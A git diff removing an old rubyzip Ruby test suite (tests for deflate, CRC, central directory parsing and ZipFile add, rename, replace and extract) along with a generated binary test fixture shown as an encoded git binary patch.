-    assert_equals("\nhello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts("hello\n", "world\n")
-    assert_equals("hello\nworld\n", @outputStream.buffer)
-    
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"])
-    assert_equals("hello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"], "bingo")
-    assert_equals("hello\nworld\nbingo\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(16, 20, 50, "hello")
-    assert_equals("16\n20\n50\nhello\n", @outputStream.buffer)
-  end
-end
-
-
-module CrcTest
-  def runCrcTest(compressorClass)
-    str = "Here's a nice little text to compute the crc for! Ho hum, it is nice nice nice nice indeed."
-    fakeOut = AbstractOutputStreamTest::TestOutputStream.new
-    
-    deflater = compressorClass.new(fakeOut)
-    deflater << str
-    assert_equals(0x919920fc, deflater.crc)
-  end
-end
-
-
-
-class PassThruCompressorTest < RUNIT::TestCase
-  include CrcTest
-
-  def test_size
-    File.open("dummy.txt", "wb") {
-      |file|
-      compressor = PassThruCompressor.new(file)
-      
-      assert_equals(0, compressor.size)
-      
-      t1 = "hello world"
-      t2 = ""
-      t3 = "bingo"
-      
-      compressor << t1
-      assert_equals(compressor.size, t1.size)
-      
-      compressor << t2
-      assert_equals(compressor.size, t1.size + t2.size)
-      
-      compressor << t3
-      assert_equals(compressor.size, t1.size + t2.size + t3.size)
-    }
-  end
-
-  def test_crc
-    runCrcTest(PassThruCompressor)
-  end
-end
-
-class DeflaterTest < RUNIT::TestCase
-  include CrcTest
-
-  def test_outputOperator
-    txt = loadFile("ziptest.rb")
-    deflate(txt, "deflatertest.bin")
-    inflatedTxt = inflate("deflatertest.bin")
-    assert_equals(txt, inflatedTxt)
-  end
-
-  private
-  def loadFile(fileName)
-    txt = nil
-    File.open(fileName, "rb") { |f| txt = f.read }
-  end
-
-  def deflate(data, fileName)
-    File.open(fileName, "wb") {
-      |file|
-      deflater = Deflater.new(file)
-      deflater << data
-      deflater.finish
-      assert_equals(deflater.size, data.size)
-      file << "trailing data for zlib with -MAX_WBITS"
-    }
-  end
-
-  def inflate(fileName)
-    txt = nil
-    File.open(fileName, "rb") {
-      |file|
-      inflater = Inflater.new(file)
-      txt = inflater.read
-    }
-  end
-
-  def test_crc
-    runCrcTest(Deflater)
-  end
-end
-
-class ZipOutputStreamTest < RUNIT::TestCase
-  include AssertEntry
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zipName = "output.zip"
-
-  def test_new
-    zos = ZipOutputStream.new(TEST_ZIP.zipName)
-    zos.comment = TEST_ZIP.comment
-    writeTestZip(zos)
-    zos.close
-    assertTestZipContents(TEST_ZIP)
-  end
-
-  def test_open
-    ZipOutputStream.open(TEST_ZIP.zipName) {
-      |zos|
-      zos.comment = TEST_ZIP.comment
-      writeTestZip(zos)
-    }
-    assertTestZipContents(TEST_ZIP)
-  end
-
-  def test_writingToClosedStream
-    assertIOErrorInClosedStream { |zos| zos << "hello world" }
-    assertIOErrorInClosedStream { |zos| zos.puts "hello world" }
-    assertIOErrorInClosedStream { |zos| zos.write "hello world" }
-  end
-
-  def test_cannotOpenFile
-    name = TestFiles::EMPTY_TEST_DIR
-    begin
-      zos = ZipOutputStream.open(name)
-    rescue Exception
-      assert($!.kind_of?(Errno::EISDIR) || # Linux 
-       $!.kind_of?(Errno::EEXIST) || # Windows/cygwin
-       $!.kind_of?(Errno::EACCES),   # Windows
-        "Expected Errno::EISDIR (or on win/cygwin: Errno::EEXIST), but was: #{$!.type}")
-    end
-  end
-
-  def assertIOErrorInClosedStream
-    assert_exception(IOError) {
-      zos = ZipOutputStream.new("test_putOnClosedStream.zip")
-      zos.close
-      yield zos
-    }
-  end
-
-  def writeTestZip(zos)
-    TEST_ZIP.entryNames.each {
-      |entryName|
-      zos.putNextEntry(entryName)
-      File.open(entryName, "rb") { |f| zos.write(f.read) }
-    }
-  end
-end
-
-
-
-module Enumerable
-  def compareEnumerables(otherEnumerable)
-    otherAsArray = otherEnumerable.to_a
-    index=0
-    each_with_index {
-      |element, index|
-      return false unless yield(element, otherAsArray[index])
-    }
-    return index+1 == otherAsArray.size
-  end
-end
-
-
-class ZipCentralDirectoryEntryTest < RUNIT::TestCase
-
-  def test_readFromStream
-    File.open("testDirectory.bin", "rb") {
-      |file|
-      entry = ZipEntry.readCDirEntry(file)
-      
-      assert_equals("longAscii.txt", entry.name)
-      assert_equals(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equals(106490, entry.size)
-      assert_equals(3784, entry.compressedSize)
-      assert_equals(0xfcd1799c, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("empty.txt", entry.name)
-      assert_equals(ZipEntry::STORED, entry.compressionMethod)
-      assert_equals(0, entry.size)
-      assert_equals(0, entry.compressedSize)
-      assert_equals(0x0, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("short.txt", entry.name)
-      assert_equals(ZipEntry::STORED, entry.compressionMethod)
-      assert_equals(6, entry.size)
-      assert_equals(6, entry.compressedSize)
-      assert_equals(0xbb76fe69, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("longBinary.bin", entry.name)
-      assert_equals(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equals(1000024, entry.size)
-      assert_equals(70847, entry.compressedSize)
-      assert_equals(0x10da7d59, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals(nil, entry)
-# Fields that are not check by this test:
-#          version made by                 2 bytes
-#          version needed to extract       2 bytes
-#          general purpose bit flag        2 bytes
-#          last mod file time              2 bytes
-#          last mod file date              2 bytes
-#          compressed size                 4 bytes
-#          uncompressed size               4 bytes
-#          disk number start               2 bytes
-#          internal file attributes        2 bytes
-#          external file attributes        4 bytes
-#          relative offset of local header 4 bytes
-
-#          file name (variable size)
-#          extra field (variable size)
-#          file comment (variable size)
-
-    }
-  end
-
-  def test_ReadEntryFromTruncatedZipFile
-    fragment=""
-    File.open("testDirectory.bin") { |f| fragment = f.read(12) } # cdir entry header is at least 46 bytes
-    fragment.extend(IOizeString)
-    entry = ZipEntry.new
-    entry.readCDirEntry(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-end
-
-class ZipCentralDirectoryTest < RUNIT::TestCase
-
-  def test_readFromStream
-    File.open(TestZipFile::TEST_ZIP2.zipName, "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.readFromStream(zipFile)
-
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames.size, cdir.size)
-      assert(cdir.compareEnumerables(TestZipFile::TEST_ZIP2.entryNames) { 
-          |cdirEntry, testEntryName|
-          cdirEntry.name == testEntryName
-        })
-      assert_equals(TestZipFile::TEST_ZIP2.comment, cdir.comment)
-    }
-  end
-
-  def test_readFromInvalidStream
-    File.open("ziptest.rb", "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.new
-      cdir.readFromStream(zipFile)
-    }
-    fail "ZipError expected!"
-  rescue ZipError
-  end
-
-  def test_ReadFromTruncatedZipFile
-    fragment=""
-    File.open("testDirectory.bin") { |f| fragment = f.read }
-    fragment.slice!(12) # removed part of first cdir entry. eocd structure still complete
-    fragment.extend(IOizeString)
-    entry = ZipCentralDirectory.new
-    entry.readFromStream(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeToStream
-    entries = [ ZipEntry.new("file.zip", "flimse", "myComment", "somethingExtra"),
-      ZipEntry.new("file.zip", "secondEntryName"),
-      ZipEntry.new("file.zip", "lastEntry.txt", "Has a comment too") ]
-    cdir = ZipCentralDirectory.new(entries, "my zip comment")
-    File.open("cdirtest.bin", "wb") { |f| cdir.writeToStream(f) }
-    cdirReadback = ZipCentralDirectory.new
-    File.open("cdirtest.bin", "rb") { |f| cdirReadback.readFromStream(f) }
-    
-    assert_equals(cdir.entries, cdirReadback.entries)
-  end
-
-  def test_equality
-    cdir1 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir2 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir3 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    cdir4 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    assert_equals(cdir1, cdir1)
-    assert_equals(cdir1, cdir2)
-
-    assert(cdir1 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir3 !=  cdir4)
-
-    assert(cdir3 !=  "hello")
-  end
-end
-
-
-class BasicZipFileTest < RUNIT::TestCase
-  include AssertEntry
-
-  def setup
-    @zipFile = ZipFile.new(TestZipFile::TEST_ZIP2.zipName)
-    @testEntryNameIndex=0
-  end
-
-  def nextTestEntryName
-    retVal=TestZipFile::TEST_ZIP2.entryNames[@testEntryNameIndex]
-    @testEntryNameIndex+=1
-    return retVal
-  end
-    
-  def test_entries
-    assert_equals(TestZipFile::TEST_ZIP2.entryNames, @zipFile.entries.map {|e| e.name} )
-  end
-
-  def test_each
-    @zipFile.each {
-      |entry|
-      assert_equals(nextTestEntryName, entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_foreach
-    ZipFile.foreach(TestZipFile::TEST_ZIP2.zipName) {
-      |entry|
-      assert_equals(nextTestEntryName, entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_getInputStream
-    @zipFile.each {
-      |entry|
-      assertEntry(nextTestEntryName, @zipFile.getInputStream(entry), 
-      entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_getInputStreamBlock
-    fileAndEntryName = @zipFile.entries.first.name
-    @zipFile.getInputStream(fileAndEntryName) {
-      |zis|
-      assertEntryContentsForStream(fileAndEntryName, 
-           zis, 
-           fileAndEntryName)
-    }
-  end
-end
-
-class CommonZipFileFixture < RUNIT::TestCase
-  include AssertEntry
-
-  EMPTY_FILENAME = "emptyZipFile.zip"
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zipName = "4entry_copy.zip"
-
-  def setup
-    File.delete(EMPTY_FILENAME) if File.exists?(EMPTY_FILENAME)
-    File.copy(TestZipFile::TEST_ZIP2.zipName, TEST_ZIP.zipName)
-  end
-end
-
-class ZipFileTest < CommonZipFileFixture
-
-  def test_createFromScratch
-    comment  = "a short comment"
-
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.comment = comment
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equals(comment, zfRead.comment)
-    assert_equals(0, zfRead.entries.length)
-  end
-
-  def test_add
-    srcFile   = "ziptest.rb"
-    entryName = "newEntryName.rb" 
-    assert(File.exists? srcFile)
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.add(entryName, srcFile)
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equals("", zfRead.comment)
-    assert_equals(1, zfRead.entries.length)
-    assert_equals(entryName, zfRead.entries.first.name)
-    AssertEntry.assertContents(srcFile, 
-             zfRead.getInputStream(entryName) { |zis| zis.read })
-  end
-
-  def test_addExistingEntryName
-    assert_exception(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) {
-  |zf|
-  zf.add(zf.entries.first.name, "ziptest.rb")
-      }
-    }
-  end
-
-  def test_addExistingEntryNameReplace
-    gotCalled = false
-    replacedEntry = nil
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      replacedEntry = zf.entries.first.name
-      zf.add(replacedEntry, "ziptest.rb") { gotCalled = true; true }
-    }
-    assert(gotCalled)
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      assertContains(zf, replacedEntry, "ziptest.rb")
-    }
-  end
-
-  def test_addDirectory
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.add(TestFiles::EMPTY_TEST_DIR, TestFiles::EMPTY_TEST_DIR)
-    }
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      dirEntry = zf.entries.detect { |e| e.name == TestFiles::EMPTY_TEST_DIR+"/" } 
-      assert(dirEntry.isDirectory)
-    }
-  end
-
-  def test_remove
-    entryToRemove, *remainingEntries = TEST_ZIP.entryNames
-
-    File.copy(TestZipFile::TEST_ZIP2.zipName, TEST_ZIP.zipName)
-
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(zf.entries.map { |e| e.name }.include?(entryToRemove))
-    zf.remove(entryToRemove)
-    assert(! zf.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equals(zf.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(! zfRead.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equals(zfRead.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zfRead.close
-  end
-
-
-  def test_rename
-    entryToRename, *remainingEntries = TEST_ZIP.entryNames
-    
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(zf.entries.map { |e| e.name }.include?  entryToRename)
-    
-    newName = "changed name"
-    assert(! zf.entries.map { |e| e.name }.include?(newName))
-
-    zf.rename(entryToRename, newName)
-    assert(zf.entries.map { |e| e.name }.include?  newName)
-
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(zfRead.entries.map { |e| e.name }.include?  newName)
-    zfRead.close
-  end
-
-  def test_renameToExistingEntry
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zipName) { |zf| oldEntries = zf.entries }
-
-    assert_exception(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) {
-  |zf|
-  zf.rename(zf.entries[0], zf.entries[1].name)
-      }
-    }
-
-    ZipFile.open(TEST_ZIP.zipName) { 
-      |zf| 
-      assert_equals(oldEntries.map{ |e| e.name }, zf.entries.map{ |e| e.name })
-    }
-  end
-
-  def test_renameToExistingEntryOverwrite
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zipName) { |zf| oldEntries = zf.entries }
-    
-    gotCalled = false
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.rename(zf.entries[0], zf.entries[1].name) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    oldEntries.delete_at(0)
-    ZipFile.open(TEST_ZIP.zipName) { 
-      |zf| 
-      assert_equals(oldEntries.map{ |e| e.name }, 
-        zf.entries.map{ |e| e.name })
-    }
-  end
-
-  def test_renameNonEntry
-    nonEntry = "bogusEntry"
-    targetEntry = "targetEntryName"
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(! zf.entries.include?(nonEntry))
-    assert_exception(ZipNoSuchEntryError) {
-      zf.rename(nonEntry, targetEntry)
-    }
-    zf.commit
-    assert(! zf.entries.include?(targetEntry))
-  ensure
-    zf.close
-  end
-
-  def test_renameEntryToExistingEntry
-    entry1, entry2, *remaining = TEST_ZIP.entryNames
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert_exception(ZipEntryExistsError) {
-      zf.rename(entry1, entry2)
-    }
-  ensure 
-    zf.close
-  end
-
-  def test_replace
-    unchangedEntries = TEST_ZIP.entryNames.dup
-    entryToReplace = unchangedEntries.delete_at(2)
-    newEntrySrcFilename = "ziptest.rb" 
-
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    zf.replace(entryToReplace, newEntrySrcFilename)
-    
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    AssertEntry::assertContents(newEntrySrcFilename, 
-        zfRead.getInputStream(entryToReplace) { |is| is.read })
-    zfRead.close    
-  end
-
-  def test_replaceNonEntry
-    entryToReplace = "nonExistingEntryname"
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      assert_exception(ZipNoSuchEntryError) {
-  zf.replace(entryToReplace, "ziptest.rb")
-      }
-    }
-  end
-
-  def test_commit
-    newName = "renamedFirst"
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    oldName = zf.entries.first
-    zf.rename(oldName, newName)
-    zf.commit
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(zfRead.entries.detect { |e| e.name == newName } != nil)
-    assert(zfRead.entries.detect { |e| e.name == oldName } == nil)
-    zfRead.close
-
-    zf.close
-  end
-
-  # This test tests that after commit, you
-  # can delete the file you used to add the entry to the zip file
-  # with
-  def test_commitUseZipEntry
-    File.copy(TestFiles::RANDOM_ASCII_FILE1, "okToDelete.txt")
-    zf = ZipFile.open(TEST_ZIP.zipName)
-    zf.add("okToDelete.txt", "okToDelete.txt")
-    assertContains(zf, "okToDelete.txt")
-    zf.commit
-    File.move("okToDelete.txt", "okToDeleteMoved.txt")
-    assertContains(zf, "okToDelete.txt", "okToDeleteMoved.txt")
-  end
-
-#  def test_close
-#    zf = ZipFile.new(TEST_ZIP.zipName)
-#    zf.close
-#    assert_exception(IOError) {
-#      zf.extract(TEST_ZIP.entryNames.first, "hullubullu")
-#    }
-#  end
-
-  def test_compound1
-    renamedName = "renamedName"
-    originalEntries = []
-    begin
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      originalEntries = zf.entries.dup
-
-      assertNotContains(zf, TestFiles::RANDOM_ASCII_FILE1)
-      zf.add(TestFiles::RANDOM_ASCII_FILE1, 
-       TestFiles::RANDOM_ASCII_FILE1)
-      assertContains(zf, TestFiles::RANDOM_ASCII_FILE1)
-
-      zf.rename(zf.entries[0], renamedName)
-      assertContains(zf, renamedName)
-
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assertContains(zf, filename)
-      }
-
-      assertContains(zf, originalEntries.last.to_s)
-      zf.remove(originalEntries.last.to_s)
-      assertNotContains(zf, originalEntries.last.to_s)
-      
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zipName)
-      assertContains(zfRead, TestFiles::RANDOM_ASCII_FILE1)
-      assertContains(zfRead, renamedName)
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  assertContains(zfRead, filename)
-      }
-      assertNotContains(zfRead, originalEntries.last.to_s)
-    ensure
-      zfRead.close
-    end
-  end
-
-  def test_compound2
-    begin
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      originalEntries = zf.entries.dup
-      
-      originalEntries.each {
-  |entry|
-  zf.remove(entry)
-  assertNotContains(zf, entry)
-      }
-      assert(zf.entries.empty?)
-      
-      TestFiles::ASCII_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assertContains(zf, filename)
-      }
-      assert_equals(zf.entries.map { |e| e.name }, TestFiles::ASCII_TEST_FILES)
-      
-      zf.rename(TestFiles::ASCII_TEST_FILES[0], "newName")
-      assertNotContains(zf, TestFiles::ASCII_TEST_FILES[0])
-      assertContains(zf, "newName")
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zipName)
-      asciiTestFiles = TestFiles::ASCII_TEST_FILES.dup
-      asciiTestFiles.shift
-      asciiTestFiles.each {
-  |filename|
-  assertContains(zf, filename)
-      }
-
-      assertContains(zf, "newName")
-    ensure
-      zfRead.close
-    end
-  end
-
-  private
-  def assertContains(zf, entryName, filename = entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} != nil, "entry #{entryName} not in #{zf.entries.join(', ')} in zip file #{zf}")
-    assertEntryContents(zf, entryName, filename) if File.exists?(filename)
-  end
-  
-  def assertNotContains(zf, entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} == nil, "entry #{entryName} in #{zf.entries.join(', ')} in zip file #{zf}")
-  end
-end
-
-class ZipFileExtractTest < CommonZipFileFixture
-  EXTRACTED_FILENAME = "extEntry"
-  ENTRY_TO_EXTRACT, *REMAINING_ENTRIES = TEST_ZIP.entryNames.reverse
-
-  def setup
-    super
-    File.delete(EXTRACTED_FILENAME) if File.exists?(EXTRACTED_FILENAME)
-  end
-
-  def test_extract
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.extract(ENTRY_TO_EXTRACT, EXTRACTED_FILENAME)
-      
-      assert(File.exists? EXTRACTED_FILENAME)
-      AssertEntry::assertContents(EXTRACTED_FILENAME, 
-          zf.getInputStream(ENTRY_TO_EXTRACT) { |is| is.read })
-    }
-  end
-
-  def test_extractExists
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    assert_exception(ZipDestinationFileExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) { 
-  |zf| 
-  zf.extract(zf.entries.first, EXTRACTED_FILENAME) 
-      }
-    }
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert_equals(writtenText, f.read)
-    }
-  end
-
-  def test_extractExistsOverwrite
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    gotCalled = false
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.extract(zf.entries.first, EXTRACTED_FILENAME) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert(writtenText != f.read)
-    }
-  end
-
-  def test_extractNonEntry
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert_exception(ZipNoSuchEntryError) { zf.extract("nonExistingEntry", "nonExistingEntry") }
-  ensure
-    zf.close if zf
-  end
-
-  def test_extractNonEntry2
-    outFile = "outfile"
-    assert_exception(ZipNoSuchEntryError) {
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      nonEntry = "hotdog-diddelidoo"
-      assert(! zf.entries.include?(nonEntry))
-      zf.extract(nonEntry, outFile)
-      zf.close
-    }
-    assert(! File.exists?(outFile))
-  end
-
-end
-
-class ZipFileExtractDirectoryTest < CommonZipFileFixture
-  TEST_OUT_NAME = "emptyOutDir"
-
-  def openZip(&aProc)
-    assert(aProc != nil)
-    ZipFile.open(TestZipFile::TEST_ZIP4.zipName, &aProc)
-  end
-
-  def extractTestDir(&aProc)
-    openZip {
-      |zf|
-      zf.extract(TestFiles::EMPTY_TEST_DIR, TEST_OUT_NAME, &aProc)
-    }
-  end
-
-  def setup
-    super
-
-    Dir.rmdir(TEST_OUT_NAME)   if File.directory? TEST_OUT_NAME
-    File.delete(TEST_OUT_NAME) if File.exists?    TEST_OUT_NAME
-  end
-    
-  def test_extractDirectory
-    extractTestDir
-    assert(File.directory? TEST_OUT_NAME)
-  end
-  
-  def test_extractDirectoryExistsAsDir
-    Dir.mkdir TEST_OUT_NAME
-    extractTestDir
-    assert(File.directory? TEST_OUT_NAME)
-  end
-
-  def test_extractDirectoryExistsAsFile
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    assert_exception(ZipDestinationFileExistsError) { extractTestDir }
-  end
-
-  def test_extractDirectoryExistsAsFileOverwrite
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    gotCalled = false
-    extractTestDir { 
-      |entry, destPath| 
-      gotCalled = true
-      assert_equals(TEST_OUT_NAME, destPath)
-      assert(entry.isDirectory)
-      true
-    }
-    assert(gotCalled)
-    assert(File.directory? TEST_OUT_NAME)
-  end
-end
-
-
-TestFiles::createTestFiles(ARGV.index("recreate") != nil || 
-         ARGV.index("recreateonly") != nil)
-TestZipFile::createTestZips(ARGV.index("recreate") != nil || 
-          ARGV.index("recreateonly") != nil)
-exit if ARGV.index("recreateonly") != nil
-
-#require 'runit/cui/testrunner'
-#RUNIT::CUI::TestRunner.run(ZipFileTest.suite)
-
-# Copyright (C) 2002 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/test/data/generated/longBinary.bin b/lib/zip/test/data/generated/longBinary.bin
deleted file mode 100644
index df673254c41319ae12b39a976892ce8292d288cd..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 300078
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
